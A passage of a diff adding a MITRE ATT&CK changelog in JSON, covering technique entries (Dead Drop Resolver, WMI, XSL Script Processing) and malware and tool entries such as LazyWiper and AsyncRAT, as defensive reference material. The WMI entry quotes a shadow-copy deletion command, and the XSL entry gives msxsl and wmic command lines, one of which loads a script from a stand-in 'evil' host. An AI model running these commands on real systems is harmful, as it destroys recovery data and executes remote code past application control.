+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.713000+00:00\", \"old_value\": \"2025-10-24 17:49:18.602000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0035: Detect Bidirectional Web Service C2 Channels via Process & Network Correlation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-14 22:24:21.841000+00:00",
+                    "modified": "2026-05-12 15:12:00.725000+00:00",
+                    "name": "Dead Drop Resolver",
+                    "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1102/001",
+                            "external_id": "T1102.001"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.725000+00:00\", \"old_value\": \"2025-10-24 17:49:37.828000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0058: Detection Strategy for Web Service: Dead Drop Resolver"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:44.329000+00:00",
+                    "modified": "2026-05-12 15:12:00.619000+00:00",
+                    "name": "Windows Management Instrumentation",
+                    "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.\n\nThe WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)\n\n**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being \u201cdisabled by default\u201d on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1047",
+                            "external_id": "T1047"
+                        },
+                        {
+                            "source_name": "FireEye WMI 2015",
+                            "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.",
+                            "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf"
+                        },
+                        {
+                            "source_name": "Mandiant WMI",
+                            "description": "Mandiant. (n.d.). Retrieved February 13, 2024.",
+                            "url": "https://www.mandiant.com/resources/reports"
+                        },
+                        {
+                            "source_name": "WMI 6",
+                            "description": "Microsoft. (2022, June 13). BlackCat. Retrieved February 13, 2024.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/"
+                        },
+                        {
+                            "source_name": "WMI 1-3",
+                            "description": "Microsoft. (2023, March 7). Retrieved February 13, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page?redirectedfrom=MSDN"
+                        },
+                        {
+                            "source_name": "WMI 7,8",
+                            "description": "Microsoft. (2024, January 26). WMIC Deprecation. Retrieved February 13, 2024.",
+                            "url": "https://techcommunity.microsoft.com/t5/windows-it-pro-blog/wmi-command-line-wmic-utility-deprecation-next-steps/ba-p/4039242"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "@ionstorm",
+                        "Olaf Hartong, Falcon Force",
+                        "Tristan Madani"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.6",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.619000+00:00\", \"old_value\": \"2025-10-24 17:48:19.670000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.6",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
+                            "M1038: Execution Prevention",
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0364: Behavioral Detection Strategy for WMI Execution Abuse on Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-10-17 00:14:20.652000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "XSL Script Processing",
+                    "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)\n\n* <code>msxsl.exe customers[.]xml script[.]xsl</code>\n* <code>msxsl.exe script[.]xsl script[.]xsl</code>\n* <code>msxsl.exe script[.]jpeg script[.]jpeg</code>\n\nAnother variation of this technique, dubbed \u201cSquiblytwo\u201d, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)\n\nCommand-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)\n\n* Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>\n* Remote File: <code>wmic os get /FORMAT:\u201dhttps[:]//example[.]com/evil[.]xsl\u201d</code>",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1220",
+                            "external_id": "T1220"
+                        },
+                        {
+                            "source_name": "Reaqta MSXSL Spearphishing MAR 2018",
+                            "description": "Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018.",
+                            "url": "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/"
+                        },
+                        {
+                            "source_name": "LOLBAS Wmic",
+                            "description": "LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.",
+                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Wmic/"
+                        },
+                        {
+                            "source_name": "Microsoft msxsl.exe",
+                            "description": "Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018.",
+                            "url": "https://web.archive.org/web/20190508171106/https://www.microsoft.com/en-us/download/details.aspx?id=21714"
+                        },
+                        {
+                            "source_name": "Penetration Testing Lab MSXSL July 2017",
+                            "description": "netbiosX. (2017, July 6). AppLocker Bypass \u2013 MSXSL. Retrieved July 3, 2018.",
+                            "url": "https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/"
+                        },
+                        {
+                            "source_name": "XSL Bypass Mar 2019",
+                            "description": "Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE \u2014 A Way to Proxy Code Execution. Retrieved August 2, 2019.",
+                            "url": "https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75"
+                        },
+                        {
+                            "source_name": "Microsoft XSLT Script Mar 2017",
+                            "description": "Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using <msxsl:script>. Retrieved July 3, 2018.",
+                            "url": "https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Avneet Singh",
+                        "Casey Smith",
+                        "Praetorian"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-15 22:53:58.559000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0205: Detect XSL Script Abuse via msxsl and wmic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "software": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [
+                {
+                    "type": "malware",
+                    "id": "malware--e4160979-b9bc-4f58-acbe-1d921ebbc122",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 22:31:11.070000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "LazyWiper",
+                    "description": "[LazyWiper](https://attack.mitre.org/software/S9039) is a destructive malware observed targeting a manufacturing sector company during the [2025 Poland Wiper Attacks](https://attack.mitre.org/campaigns/C0063). [LazyWiper](https://attack.mitre.org/software/S9039) is a native Windows PowerShell script that is believed to have been generated by a large language model (LLM). [LazyWiper](https://attack.mitre.org/software/S9039) overwrites files on the system using the C# function `WriteRandomBytes()` and can target multiple specific file types by their extensions.(Citation: CERT Polska)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9039",
+                            "external_id": "S9039"
+                        },
+                        {
+                            "source_name": "CERT Polska",
+                            "description": "CERT Polska. (2026, January 30). Energy Sector Incident  Report \u2013 29 December. Retrieved April 22, 2026.",
+                            "url": "https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "LazyWiper"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2026-04-23 15:08:43.762000+00:00\"}, \"root['description']\": {\"new_value\": \"[LazyWiper](https://attack.mitre.org/software/S9039) is a destructive malware observed targeting a manufacturing sector company during the [2025 Poland Wiper Attacks](https://attack.mitre.org/campaigns/C0063). [LazyWiper](https://attack.mitre.org/software/S9039) is a native Windows PowerShell script that is believed to have been generated by a large language model (LLM). [LazyWiper](https://attack.mitre.org/software/S9039) overwrites files on the system using the C# function `WriteRandomBytes()` and can target multiple specific file types by their extensions.(Citation: CERT Polska)\", \"old_value\": \"[LazyWiper](https://attack.mitre.org/software/S9039) is a destructive malware observed targeting a manufacturing sector company during the [2025 Poland Wiper Attacks](https://attack.mitre.org/campaigns/C0063). [LazyWiper](https://attack.mitre.org/software/S9039) is a native Windows PowerShell script that is believed to have been generated by a large language model (LLM). [LazyWiper](https://attack.mitre.org/software/S9039) overwrites files on the system using the C# function `WriteRandomBytes()` and can targets multiple specific file types by their extensions.(Citation: CERT Polska)\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
+                    "previous_version": "1.0",
+                    "version_change": "1.0 \u2192 1.1",
+                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to1__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to1__0\"><a href=\"#difflib_chg_to1__top\">t</a></td><td class=\"diff_header\" id=\"from1_1\">1</td><td nowrap=\"nowrap\">[LazyWiper](https://attack.mitre.org/software/S9039)&nbsp;is&nbsp;a&nbsp;de</td><td class=\"diff_next\"><a href=\"#difflib_chg_to1__top\">t</a></td><td class=\"diff_header\" id=\"to1_1\">1</td><td nowrap=\"nowrap\">[LazyWiper](https://attack.mitre.org/software/S9039)&nbsp;is&nbsp;a&nbsp;de</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">structive&nbsp;malware&nbsp;observed&nbsp;targeting&nbsp;a&nbsp;manufacturing&nbsp;sector&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">structive&nbsp;malware&nbsp;observed&nbsp;targeting&nbsp;a&nbsp;manufacturing&nbsp;sector&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">company&nbsp;during&nbsp;the&nbsp;[2025&nbsp;Poland&nbsp;Wiper&nbsp;Attacks](https://attac</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">company&nbsp;during&nbsp;the&nbsp;[2025&nbsp;Poland&nbsp;Wiper&nbsp;Attacks](https://attac</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">k.mitre.org/campaigns/C0063).&nbsp;[LazyWiper](https://attack.mit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">k.mitre.org/campaigns/C0063).&nbsp;[LazyWiper](https://attack.mit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re.org/software/S9039)&nbsp;is&nbsp;a&nbsp;native&nbsp;Windows&nbsp;PowerShell&nbsp;script</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">re.org/software/S9039)&nbsp;is&nbsp;a&nbsp;native&nbsp;Windows&nbsp;PowerShell&nbsp;script</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;that&nbsp;is&nbsp;believed&nbsp;to&nbsp;have&nbsp;been&nbsp;generated&nbsp;by&nbsp;a&nbsp;large&nbsp;language</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;that&nbsp;is&nbsp;believed&nbsp;to&nbsp;have&nbsp;been&nbsp;generated&nbsp;by&nbsp;a&nbsp;large&nbsp;language</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;model&nbsp;(LLM).&nbsp;[LazyWiper](https://attack.mitre.org/software/</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;model&nbsp;(LLM).&nbsp;[LazyWiper](https://attack.mitre.org/software/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">S9039)&nbsp;overwrites&nbsp;files&nbsp;on&nbsp;the&nbsp;system&nbsp;using&nbsp;the&nbsp;C#&nbsp;function&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">S9039)&nbsp;overwrites&nbsp;files&nbsp;on&nbsp;the&nbsp;system&nbsp;using&nbsp;the&nbsp;C#&nbsp;function&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">`WriteRandomBytes()`&nbsp;and&nbsp;can&nbsp;target<span class=\"diff_chg\">s&nbsp;multiple&nbsp;specific&nbsp;file&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">`WriteRandomBytes()`&nbsp;and&nbsp;can&nbsp;target<span class=\"diff_chg\">&nbsp;multiple&nbsp;specific&nbsp;file&nbsp;t</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">types</span>&nbsp;by&nbsp;their&nbsp;extensions.(Citation:&nbsp;CERT&nbsp;Polska)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_chg\">ypes</span>&nbsp;by&nbsp;their&nbsp;extensions.(Citation:&nbsp;CERT&nbsp;Polska)</td></tr>\n        </tbody>\n    </table>"
+                }
+            ],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "malware",
+                    "id": "malware--05318127-5962-444b-b900-a9dcfe0ff6e9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-07-14 17:30:54.927000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "Amadey",
+                    "description": "[Amadey](https://attack.mitre.org/software/S1025) is a Trojan bot that has been used since at least October 2018.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1025",
+                            "external_id": "S1025"
+                        },
+                        {
+                            "source_name": "Korean FSI TA505 2020",
+                            "description": "Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.",
+                            "url": "https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory="
+                        },
+                        {
+                            "source_name": "BlackBerry Amadey 2020",
+                            "description": "Kasuya, M. (2020, January 8). Threat Spotlight: Amadey Bot Targets Non-Russian Users. Retrieved July 14, 2022.",
+                            "url": "https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Amadey"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2024-05-07 19:11:33.669000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--30489451-5886-4c46-90c9-0dff9adc5252",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:33:02.428000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "Arp",
+                    "description": "[Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0099",
+                            "external_id": "S0099"
+                        },
+                        {
+                            "source_name": "TechNet Arp",
+                            "description": "Microsoft. (n.d.). Arp. Retrieved April 17, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/library/bb490864.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Arp",
+                        "arp.exe"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "Windows",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.740000+00:00\", \"old_value\": \"2026-04-17 20:59:19.130000+00:00\"}}}",
+                    "previous_version": "1.3"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--bb6f2a5c-dbc9-45b0-bd3f-a0b7849959c2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 14:04:02.153000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "AshTag",
+                    "description": "[AshTag](https://attack.mitre.org/software/S9031) is a modular .NET backdoor with multiple features that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2025. [AshTag](https://attack.mitre.org/software/S9031) is designed for persistence and remote command execution and can masquerade as a legitimate VisualServer utility.(Citation: Palo Alto Ashen Lepus DEC 2025)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S9031",
+                            "external_id": "S9031"
+                        },
+                        {
+                            "source_name": "Palo Alto Ashen Lepus DEC 2025",
+                            "description": "Unit 42. (2025, December 11). Hamas-Affiliated Ashen Lepus Targets Middle Eastern Diplomatic Entities With New AshTag Malware Suite. Retrieved April 20, 2026.",
+                            "url": "https://unit42.paloaltonetworks.com/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "AshTag"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2026-04-20 14:04:58.202000+00:00\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "tool",
+                    "id": "tool--6a5947f3-1a36-4653-8734-526df3e1d28d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-09-20 17:32:59.932000+00:00",
+                    "modified": "2026-05-12 15:12:00.740000+00:00",
+                    "name": "AsyncRAT",
+                    "description": "[AsyncRAT](https://attack.mitre.org/software/S1087) is an open-source remote access tool originally available through the NYANxCAT Github repository that has been used in malicious campaigns.(Citation: Morphisec Snip3 May 2021)(Citation: Cisco Operation Layover September 2021)(Citation: Telefonica Snip3 December 2021)",
+                    "revoked": false,
+                    "labels": [
+                        "tool"
+                    ],
